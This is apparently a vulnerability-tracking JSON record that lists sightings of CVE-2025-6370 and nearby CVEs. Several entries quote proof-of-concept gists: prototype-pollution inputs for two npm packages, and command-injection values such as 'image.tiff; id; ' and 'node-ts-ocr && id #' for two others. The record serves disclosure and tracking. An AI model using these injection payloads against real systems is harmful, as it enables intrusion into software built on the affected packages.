{"vulnerability": "CVE-2025-6370", "sightings": [{"uuid": "752cfcd7-eab8-4856-ace8-68f226e1c73c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-6370", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114774193882630947", "content": "", "creation_timestamp": "2025-06-30T20:26:56.815052Z"}, {"uuid": "a63c8035-5ae1-4cab-b808-546d9131a90d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-6370", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3ls3fo2yiva2r", "content": "", "creation_timestamp": "2025-06-21T01:29:15.160889Z"}, {"uuid": "ab9eb8fb-0616-4d54-b614-556035611c90", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-63709", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3m5bxdzb5do2s", "content": "", "creation_timestamp": "2025-11-10T15:38:51.413525Z"}, {"uuid": "830b981a-e156-4360-88a1-ca32e1c54074", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-63703", "type": "seen", "source": "https://gist.github.com/6en6ar/bdc8e0d472406ab98431f10273cbdbf3", "content": "Product: https://www.npmjs.com/package/parse-ini\nVersion: v1.0.6\nVulnerability type: Prototype Pollution inside parse-ini npm package through version 1.0.6\nCVE ID: CVE-2025-63703\n\nDescription: \nThere exists a prototype pollution vulnerability in parse-ini npm package, more specifically on lines 101. and 104 inside index.js() \nwhere the code does not check for presence of attacker controlled prototypes that can be supplied inside .ini files.\nPrototype  pollution enables attacker to add arbitrary properties to global object prototypes, which may then be inherited by user-defined objects,\nthat can lead to code execution or denial of service in certain scenarios.\n\nPayload used:\n\nvar parser = require('parse-ini');\nvar iniObj = parser.parse('file.ini');\nconsole.log(iniObj.__proto__); //polluted\nconsole.log({}.polluted)//polluted\nconsole.log(iniObj.MySectionName.lastUsed);\n>\nPayload used(file.ini):\n\n; file.ini\nvariable1 = value1\n{MySectionName]\nlastUsed=3\n[__proto__]\npolluted = \"polluted\"", "creation_timestamp": "2026-05-06T19:46:52.000000Z"}, {"uuid": "ff47658c-441d-4e13-9949-de177382b406", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-6370", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/19084", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-6370\n\ud83d\udd25 CVSS Score: 8.7 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P)\n\ud83d\udd39 Description: A vulnerability classified as critical was found in D-Link DIR-619L 2.06B01. Affected by this vulnerability is the function formWlanGuestSetup of the file /goform/formWlanGuestSetup. The manipulation of the argument curTime leads to stack-based buffer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. This vulnerability only affects products that are no longer supported by the maintainer.\n\ud83d\udccf Published: 2025-06-20T22:00:15.539Z\n\ud83d\udccf Modified: 2025-06-20T22:00:15.539Z\n\ud83d\udd17 References:\n1. https://vuldb.com/?id.313363\n2. https://vuldb.com/?ctiid.313363\n3. https://vuldb.com/?submit.597423\n4. https://github.com/wudipjq/my_vuln/blob/main/D-Link6/vuln_70/70.md\n5. https://www.dlink.com/", "creation_timestamp": "2025-06-20T22:44:49.000000Z"}, {"uuid": "6b2ab262-363f-46b6-a97b-847431e9b8bf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-63708", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3m5tq2j2wt62j", "content": "", "creation_timestamp": "2025-11-17T17:16:11.715778Z"}, {"uuid": "087a794c-efd4-48a8-91a1-dd9455f587ce", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-63704", "type": "seen", "source": "https://gist.github.com/6en6ar/d62f614dbb2b1032b5e45a56fe26ec8b", "content": "Product: https://www.npmjs.com/package/query-string-parser\nVersion: v1.0.0\nVulnerability type: Prototype Pollution vulnerability inside query-string-parser through version 1.0.0\nCVE ID: CVE-2025-63704\nDiscovered: lelecolacola123, 6en6ar\n\nDescription: \nNPM package query-parser-string does not properly sanitize user supplied query parameters and merges them to the newly created object. \nThis happens inside _fillValue function inside index.js, when calling fromQuery to parse query parameters.\n\nPayload used:\n\n> const { toQuery, fromQuery } = require('query-string-parser')\n> const queryString = fromQuery(\"a=1&b=2&__proto__[polluted]=polluted\")\n> console.log(\"Query string object polluted: \"+queryString.__proto__.polluted)\n> console.log(\"POlluted object: \" + {}.polluted)\n> let obj = {}\n> console.log(\"Newly created obj: \" + obj.polluted)", "creation_timestamp": "2026-05-06T19:53:03.000000Z"}, {"uuid": "ff137241-e047-4bb0-ac1b-b07eb0e930a1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-63705", "type": "seen", "source": "https://gist.github.com/6en6ar/a2ac44da0f4e580190be3e66cfbb9a4a", "content": "Product: https://www.npmjs.com/package/node-ts-ocr\nVersion: v1.0.15\nVulnerability type: OS Command Injection in node-ts-ocr through version 1.0.15\nCVE ID: CVE-2025-63705\n\nDescription: \n\ninvokeImageOcr function inside src/index.js does not sanitize imagePath variable on line 156. that is attacker controlled when using child_process to execute a command.\nnode-ts-ocr ackage provides a wrapper for modifying and manipulating image files. One of the commands it uses for this is tesseract in invokeImageOcr function. If an attacker provides a string such as 'image.tiff; id; ' it can inject this command in the cmd variable that is later executed by child_process.\nThe imagePath variable is not sanitized and this leads to command injection. \n\nPayload used:\n\n> import { Ocr } from 'node-ts-ocr';\n>\n> \n> export async function runTesseract(fileName) {\n>\n>         return await Ocr.invokeImageOcr('test_tesseract', fileName);\n> }\n>\n> async function main() {\n>   try {\n>     var ret = runTesseract('image.tiff; id; ');\n>     console.log('Result testing invokeImageOcr -> ', ret);\n>   } catch (err) {\n>     console.error('error running OCR:', err);\n>   }\n> }\n>\n> main();", "creation_timestamp": "2026-05-06T19:56:42.000000Z"}, {"uuid": "e86e92f8-0137-409f-89ba-bf48237ffc8c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-63706", "type": "seen", "source": "https://gist.github.com/6en6ar/607368f1fc8fe429f03c6e0d9486ba72", "content": "\nProduct: https://www.npmjs.com/package/@jswork/next-npm-version\nVersion: v1.0.1\nVulnerability type: Command injection inside @jswork/next-npm-version through version 1.0.1\nCVE ID: CVE-2025-63706\n\nDescription: \nNPM package next-npm-version through function nx.npmVersion defined on line 19. inside index.js does not properly sanitize inName variable before it is passed to execSync which executes a command using npm show.\nAn attacker is able to inject code when calling npmVersion function to check the version of the npm package. This is possible because the code is not sanitizing inName variable before it is  passed to child_process execSync. \nThis code uses npm show to cli command to execute the code.\n\nPayload used:\n\n> import '@jswork/next-npm-version';\n>\n> console.log(nx.npmVersion('node-ts-ocr && id #'));\n> // '2.6.0'\n>\n> This executes the 'id' command.", "creation_timestamp": "2026-05-06T19:59:28.000000Z"}]}